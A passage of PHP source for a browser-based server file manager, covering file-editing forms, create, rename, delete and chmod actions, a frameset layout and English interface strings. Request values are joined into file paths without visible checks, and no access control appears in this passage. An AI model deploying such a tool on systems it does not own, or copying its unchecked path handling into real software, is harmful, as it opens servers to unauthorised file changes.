style=\"padding:5px;\"> <form name=\"edit_form\" action=\"".$fm_path_info["basename"]."\" method=\"post\"> <input type=hidden name=action value=\"7\"> <input type=hidden name=save_file value=\"1\"> <input type=hidden name=fm_current_dir value=\"$fm_current_dir\"> <input type=hidden name=filename value=\"$filename\"> <tr><th colspan=2>".$file."</th></tr> <tr><td colspan=2><textarea name=file_data style='width:1000px;height:680px;border: 1px solid #ccc;'>".($file_data)."</textarea></td></tr> <tr><td><input type=button value=\"".et('Refresh')."\" onclick=\"document.edit_form_refresh.submit()\"></td><td align=right><input type=button value=\"".et('Save File')."\" onclick=\"go_save()\"></td></tr> </form> <form name=\"edit_form_refresh\" action=\"".$fm_path_info["basename"]."\" method=\"post\"> <input type=hidden name=action value=\"7\"> <input type=hidden name=fm_current_dir value=\"$fm_current_dir\"> <input type=hidden name=filename value=\"$filename\"> </form> </table> <script language=\"Javascript\" type=\"text/javascript\"> <!-- function go_save(){"; if (is_writable($file)) { echo " document.edit_form.submit();"; } else { echo " if(confirm('".et('ConfTrySave')." ?')) document.edit_form.submit();"; } echo " } window.focus(); //--> </script> </body>\n</html>"; } function server_info_form(){ } function frame3(){ global $is_windows,$cmd_arg,$chmod_arg,$zip_dir,$fm_current_root,$cookie_cache_time; global $dir_dest,$fm_current_dir,$dir_before; global $selected_file_list,$selected_dir_list,$old_name,$new_name; global $action,$or_by,$order_dir_list_by; if (!isset($order_dir_list_by)){ $order_dir_list_by = "1A"; setcookie("order_dir_list_by", $order_dir_list_by , time()+$cookie_cache_time , "/"); } elseif (isset($or_by)){ $order_dir_list_by = $or_by; setcookie("order_dir_list_by", $or_by , time()+$cookie_cache_time , "/"); } html_header(); echo "<body>\n"; if ($action){ switch ($action){ case 1: // create dir if (strlen($cmd_arg)){ $cmd_arg = $fm_current_dir.$cmd_arg; if (!file_exists($cmd_arg)){ @mkdir($cmd_arg,0755); @chmod($cmd_arg,0755); reloadframe("parent",2,"&ec_dir=".$cmd_arg); } else alert(et('FileDirExists')."."); } break; case 2: // create arq if (strlen($cmd_arg)){ $cmd_arg = $fm_current_dir.$cmd_arg; if (!file_exists($cmd_arg)){ if ($fh = @fopen($cmd_arg, "w")){ @fclose($fh); } @chmod($cmd_arg,0644); } else alert(et('FileDirExists')."."); } break; case 3: // rename arq ou dir if ((strlen($old_name))&&(strlen($new_name))){ rename($fm_current_dir.$old_name,$fm_current_dir.$new_name); if (is_dir($fm_current_dir.$new_name)) reloadframe("parent",2); } break; case 4: // delete sel if(strstr($fm_current_dir,$fm_current_root)){ if (strlen($selected_file_list)){ $selected_file_list = explode("<|*|>",$selected_file_list); if (count($selected_file_list)) { for($x=0;$x<count($selected_file_list);$x++) { $selected_file_list[$x] = trim($selected_file_list[$x]); if (strlen($selected_file_list[$x])) total_delete($fm_current_dir.$selected_file_list[$x],$dir_dest.$selected_file_list[$x]); } } } if (strlen($selected_dir_list)){ $selected_dir_list = explode("<|*|>",$selected_dir_list); if (count($selected_dir_list)) { for($x=0;$x<count($selected_dir_list);$x++) { $selected_dir_list[$x] = trim($selected_dir_list[$x]); if (strlen($selected_dir_list[$x])) total_delete($fm_current_dir.$selected_dir_list[$x],$dir_dest.$selected_dir_list[$x]); } reloadframe("parent",2); } } } break; case 5: // copy sel break; case 6: // move sel break; case 8: // delete arq/dir if (strlen($cmd_arg)){ if (file_exists($fm_current_dir.$cmd_arg)) total_delete($fm_current_dir.$cmd_arg); if (is_dir($fm_current_dir.$cmd_arg)) reloadframe("parent",2); } break; case 9: // CHMOD if((strlen($chmod_arg) == 4)&&(strlen($fm_current_dir))){ if ($chmod_arg[0]=="1") $chmod_arg = "0".$chmod_arg; else $chmod_arg = "0".substr($chmod_arg,strlen($chmod_arg)-3); $new_mod = octdec($chmod_arg); if (strlen($selected_file_list)){ $selected_file_list = explode("<|*|>",$selected_file_list); if (count($selected_file_list)) { for($x=0;$x<count($selected_file_list);$x++) { $selected_file_list[$x] = trim($selected_file_list[$x]); if (strlen($selected_file_list[$x])) @chmod($fm_current_dir.$selected_file_list[$x],$new_mod); } } } if (strlen($selected_dir_list)){ $selected_dir_list = explode("<|*|>",$selected_dir_list); if (count($selected_dir_list)) { for($x=0;$x<count($selected_dir_list);$x++) { $selected_dir_list[$x] = trim($selected_dir_list[$x]); if (strlen($selected_dir_list[$x])) @chmod($fm_current_dir.$selected_dir_list[$x],$new_mod); } } } } break; } if ($action != 10) dir_list_form(); } else dir_list_form(); echo "</body>\n</html>"; } function frameset(){ global $fm_path_info,$leftFrameWidth; if (!isset($leftFrameWidth)) $leftFrameWidth = 30; html_header(); echo " <frameset cols=\"".$leftFrameWidth.",*\" framespacing=\"0\"> <frameset rows=\"0,*\" framespacing=\"0\" frameborder=\"0\"> <frame src=\"".$fm_path_info["basename"]."?frame=1\" name=frame1 border=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <frame src=\"".$fm_path_info["basename"]."?frame=2\" name=frame2 border=\"0\" marginwidth=\"0\" marginheight=\"0\"> </frameset> <frame src=\"".$fm_path_info["basename"]."?frame=3\" name=frame3 border=\"0\" marginwidth=\"0\" marginheight=\"0\"> </frameset> </html>"; } // +-------------------------------------------------- // | Internationalization // +-------------------------------------------------- function et($tag){ global $lang; // English - by Fabricio Seger Kolling $et['en']['CreateArq'] = 'Create File'; $et['en']['UploadEnd'] = 'Upload Finished'; $et['en']['Perms'] = 'Permissions'; $et['en']['Exec'] = 'Execute'; $et['en']['File_s'] = 'file(s)'; $et['en']['Dir_s'] = 'directory(s)'; $et['en']['JSError'] = 'JavaScript Error'; $et['en']['NoSel'] = 'There are no selected itens'; $et['en']['TypeDir'] = 'Enter the directory name'; $et['en']['TypeArq'] = 'Enter the file name'; $et['en']['RemSel'] = 'DELETE selected itens'; $et['en']['NoDestDir'] = 'There is no selected destination directory'; $et['en']['DestEqOrig'] = 'Origin and destination directories are equal'; $et['en']['InvalidDest'] = 'Destination directory is invalid'; $et['en']['NoNewPerm'] = 'New permission not set'; $et['en']['CopyTo'] = 'COPY to'; $et['en']['MoveTo'] = 'MOVE to'; $et['en']['AlterPermTo'] = 'CHANGE PERMISSIONS to'; $et['en']['ConfExec'] = 'Confirm EXECUTE'; $et['en']['ConfRem'] = 'Confirm DELETE'; $et['en']['EmptyDir'] = 'Empty directory'; $et['en']['IOError'] = 'I/O Error'; $et['en']['FileMan'] = 'PHP File Manager'; $et['en']['ReadDenied'] = 'Read Access Denied'; $et['en']['FileNotFound'] = 'File not found'; $et['en']['ConfTrySave'] = 'File without write permisson.\\nTry to save anyway'; $et['en']['FileDirExists'] = 'File or directory already exists'; $et['en']['NoPhpinfo'] = 'Function phpinfo disabled'; $et['en']['FileSent'] = 'File sent'; $et['en']['SpaceLimReached'] = 'Space limit reached'; $et['en']['InvExt'] = 'Invalid extension'; $et['en']['FileNoOverw'] = 'File could not be overwritten'; $et['en']['FileOverw'] = 'File overwritten'; $et['en']['FileIgnored'] = 'File ignored'; $et['en']['Website'] = 'Website'; $et['en']['SendingForm'] = 'Sending files, please wait'; $et['en']['NoFileSel'] = 'No file selected'; $et['en']['SelAll'] = 'All'; $et['en']['SelNone'] = 'None'; $et['en']['SelInverse'] = 'Inverse'; $et['en']['Selected_s'] = 'selected'; $et['en']['Close'] = 'Close'; if (isset($et['en'][$tag])) return ($et['en'][$tag]); else return "$tag"; // So we can know what is missing } // +-------------------------------------------------- // | THE END // +--------